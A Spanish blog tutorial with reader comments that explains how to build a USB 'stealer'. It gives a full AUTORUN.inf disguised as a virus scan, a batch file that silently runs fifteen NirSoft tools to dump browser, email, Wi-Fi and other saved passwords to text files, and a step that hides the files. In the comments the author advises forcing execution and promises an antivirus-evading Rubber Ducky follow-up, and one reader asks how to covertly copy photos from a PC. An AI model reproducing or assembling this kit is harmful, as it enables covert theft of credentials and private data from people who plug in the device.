Cómo crear un USB Keylogger/Stealer para recuperar contraseñas

ladrondeusb

Hace unas semana publiqué una entrada sobre Stealers y expliqué lo que eran y para que servían, hoy vengo a explicaros como crear un USB que se autoejecute y recupere todas nuestras contraseñas del PC de manera automática, únicamente con conectarlo a nuestro PC, sin tocar absolutamente nada, ademas tendrá una función Keylogger, que registrará en un archivo .txt todo lo que pulsemos en nuestro teclado mientras el USB esté conectado al PC.

Pasos a seguir

1) Inserta un pendrive para formatearlo, haz «Click derecho» sobre la unidad y en «Formatear», podemos formatearlo en NTFS o FAT32 (este último es mas recomendado).usbpen1usbpen2

2) Abrimos el bloc de notas o similar y escribimos lo siguiente:

[autorun]
open = launch.bat
UseAutoPlay = 1
ACTION = Escaneando con VirusScan

Guardamos el archivo con el nombre AUTORUN.inf y lo dejamos dentro del USB.

3) Volvemos al bloc de notas para crear otro archivo, esta vez escribiremos:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt

Guardamos el archivo con el nombre LAUNCH.bat y lo dejamos dentro del USB.

4) Visitamos la web http://www.nirsoft.net/ y nos descargamos las siguiente herramientas:

mspass.exe
mailpv.exe
iepv.exe
pspv.exe
PasswordFox.exe
OperaPassView.exe
ChromePass.exe
Dialupass2.exe
Netpass.exe
WirelessKeyView.exe
BulletsPassView.exe
VNCPassView.exe
OpenedFilesView.exe
ProduKey.exe
USBDeview.exe

Debemos de descomprimirlas en la raiz del USB, os dejo un link con las direcciones de las Herramientas.

Nos quedaría de la siguiente manera.

usbnir1

5) Descomprimimos todas las herramientas y ocultamos todos los archivos, al final todo quedaría así:

usbnir2 usbnir3

6) Quitamos el USB del ordenador y lo volvemos a insertar para comprobar que funciona, si todo ha ido bien nos aparecerán los siguientes .txt, que no hace falta que los abra porque ya se sabe lo que contienen, todas las contraseñas del sistema, incluidas las del WI-FI.

usbnir4

Espero que os haya gustado, y ya sabéis, no conectéis ningún USB a vuestro ordenador si no es vuestro o dudáis de lo que puede contener.

78 comentarios en “Cómo crear un USB Keylogger/Stealer para recuperar contraseñas”

  1. Avatar

    OYE AMIGO FUNCIONA BIEN LA DE CONTRAER LA CONTRASEÑAS DE WIFI PERO POR ALGUNA RAZON NO SACA LA ULTIMA CONTRASEÑA LA ACTUAL, LO PROBE EN MI PC Y BUENO ESO ES LO QUE PASA

      1. Avatar

        Tu sabes lo que es un keylogger? hay muchas definiciones, pero que diré que keylogger significa «registrador de teclas». Es decir, guarda lo que escribe el usuario en el teclado, no lo que esta almacenado en el sistema. Pon «USB para recuperar contaseñas», pero no «keylogger» por que es falso.

  2. Avatar

    Funciona si abres el .bat manualmente, pero algunas programas ya están obsoletos (ChromePass, por ejemplo) y no sirven. Agradeceria mucho que hicieras un nuevo tutorial actualizado

  3. Avatar

    Creo que el tutorial ya esta algo obsoleto, lamentablemente no me funciono (Uso Windows 10). Espero que en un futuro actualices el tutorial o hagas algún otro con el mismo propósito.
    Muchas gracias por todo y muy bien explicado.

  4. Avatar

    Hola amigo intente los pasos pero no funcionó podrías actualizarlo ya q al usar el usb no salió ningún archivo y la otra es funciona con el pc bloqueado con cuenta de usuario y si el antivirus lo puede detectar y bloquear …se espera pronta respuesta

    1. Javier Olmedo

      Hola Roberto,
      El post es de hace tiempo, es posible que algunas cosas hayan cambiado, de todas maneras, veré si saco tiempo y hago un post sobre USB Rubber Ducky, esto es indetectable por los antivirus y se ajusta más a lo que necesitas.
      Saludos,
      Gracias!

  5. Avatar

    amigo ya lo puliste? una duda al crear el archivo launch.bat y lo quiero ejecutar se abre con el bloc de notas me fui a aplicaciones predeterminadas pero no me da otra opcion que puedo hacer solo es en mi maquina win 8.1
    y si ejecuto las apps me da un archivo .cfg

  6. Avatar

    hola amigo, me salio todo perfecto pero lo unica la duda es que no me aparece los documentos de textos o ya despues de conectarlo el usb ¿ que debe de suceder? espero y me respondas y muchas gracias amigo por el tutorial.

  7. Avatar

    buenas Javier creo que haces un buen trabajo al brindarnos tu experiencia y conocimiento en forma gratuita…mas lamento decir que no me ha funcionado en mi en windows 10. espero me des alguna solución.
    un abrazo!!

  8. Avatar

    Hola javier, muchas gracias por el aporte! primero que nada no le des bola a los comentarios negativos segui para adelante.

    Con respecto al .inf no me estaría funcionando conecto el pen pero el .bat no se ejecuta si lo hago manualmente si

    Sabes que puede ser?

    Saludos!

    1. Javier Olmedo

      Buenas Matias,

      Te agradezco que valores mi trabajo.
      Dependiendo en el sistema operativo / máquina que lo hagas lo hará automáticamente o no.
      Puedes crear accesos directos en el pen con .bat ocultos para que se ejecute.

      Saludos.
      Gracias.

  9. Avatar

    Buenas.

    He seguido el tutorial al pie de la letra y funciona todo salvo el generar automáticamente los archivos de texto con las contraseñas. Es decir, puedo ejecutar manualmente el .exe de algún programa, como el ChromePass y ver o guardar por mi mismo el archivo de texto pero no lo genera solo el .bat.

    Lo he probado en dos equipos distintos y no ha dado resultado, en uno veía los archivos ocultos y en el otro directamente no hacía nada.
    Cabe decir que ambos ordenadores tienen W10.

    ¿Tiene algo que ver el sistema operativo? ¿He hecho algo mal?

    Un saludo y gracias por tu tiempo.

  10. Avatar

    hola como estas Javier muy bueno el tutorial, lo unico que como una persona pregunto no todos los ejecutables crean el txt como por ejemplo el ChromePass.exe y creo que es el mas importante a la hora de extraer contraseñas, solo crea un archivo cfg sin informacion importante… sabes como habria que hacer para solucionarlo? y ademas seria ideal agregar algun comando para que vuelva a cerrar todas las ventanas que abre el ejecutable para que sea del todo automatica..Gracias!

    1. Avatar

      Estimado saludos, gracias por compartir tus conocimientos…la verdad muy agradecido… para descomprirmir los archivos en el pendrive se hace 1 por 1… o se seleccionan todos y se extraen todos ..porq me sale cada vz que se debe reemplazar un archivo que hago se le da si, a todo o se le da no, a todo con respecto al archivo http://www.nirsoft.net/utils/dialupass2.html ya no existe hay una version 3 habra algun problema con eso esperando ..una pronta respuesta estimado y gracias nuevamente

  11. Avatar

    Me extraña que supuestamente seas un informático, programador, apasionado de la seguridad… y publiques esta mierda en el año 2015, cuando eso ya hace años que no funciona, debido a que los S.O. actuales, el autorun lo tiene deshabilitado por defecto. O intentas vender humo o de informático tienes poco.

    1. Javier Olmedo

      Hola MrDeiii,

      Agradecería que tus comentarios no faltaran el respeto, puede parecerte una «mierda», pero como te he comentado en el comentario anterior, funciona perfectamente incluso en Windows 10, otra cosa es que seas «habilidoso» para activar el autorun.
      En cuanto a lo de informático y programador, no sé si lo seré, desde luego he estudiado unos cuantos añitos y aquí tengo los títulos.

      Saludos.

    1. Avatar

      Eso que explica no funciona. Funcionaba hace unos 10 años o mas, pero actualmente no, ja que se ejecuta automáticamente con autorun y el autorun, en los sistemas operativos actuales esta deshabilitado. Creo que el ultimo Windows que lo tenia habilitado por defecto, era el XP.

  12. Avatar

    Muy buen post lo unico es que no me funciona hice todo igualito que tu pero al volver a conectar el usb no aparecen los archivos txt me pueder decir porque o alomejor no es compatible con el windows 8.1

  13. Avatar

    Buenas, e echo todo el proceso, pero cuando quito la memoria y vuelvo y la meto no me aparece ninguna contraseña, me aparece sin nada le mamoria, el archivo Dialupass2.exe no se encuentra, se encuentra es la vercion 3, que fue la que descargue, hay algun problema de pronto en eso ?

  14. Avatar

    muy bueno el post!!! me he quedado impresionada. Me gustaria saber si hay alguna opcion de copiar el contenido de todas las imagenes jpeg o videos del pc tb al usb en modo oculto
    muchas gracias

  15. Avatar

    Las herramientas de Nir ya las conocía, pero este método está muy bien….siempre y cuando no tenga inhabilitado el autorun del usb…

    Lo probaré, muy instructivo….le enseñaré a mi hijo que no se fie de un pendrive ajeno…

    Saludos

Deja tu comentario

Ir arriba